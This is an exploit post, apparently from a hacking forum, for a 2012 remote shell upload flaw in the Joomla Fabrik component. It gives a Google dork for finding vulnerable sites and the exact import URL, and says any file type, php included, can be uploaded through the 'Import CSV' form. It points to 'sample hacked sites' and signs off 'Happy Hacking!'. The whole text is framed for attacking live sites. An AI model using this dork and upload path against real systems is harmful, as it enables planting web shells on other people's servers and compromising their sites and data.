$************************************************* *******************************$
# +================================================= ================+
# | Joomla Component (com_Fabrik) Remote Shell Upload Vulnerability |
# +================================================= ================+
# Google Dork : inurl:index.php?option=com_fabrik or index.php?option=com_fabrik
# Date : 14/09/2012
# Exploit Author : D35m0nd142
# Vendor Homepage :
[You must be registered and logged in to see this link.]# Tested on : Mozilla Firefox on Ubuntu 12.04
$************************************************* *******************************$
Exploit: - Code:
-
/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
In this webpage there is the possibility toupload any type of files (php,asp,html,jpg .. ) through the form "
Import CSV".
Sample hacked sites:[You must be registered and logged in to see this link.]Live Demo:[You must be registered and logged in to see this link.]Happy Hacking!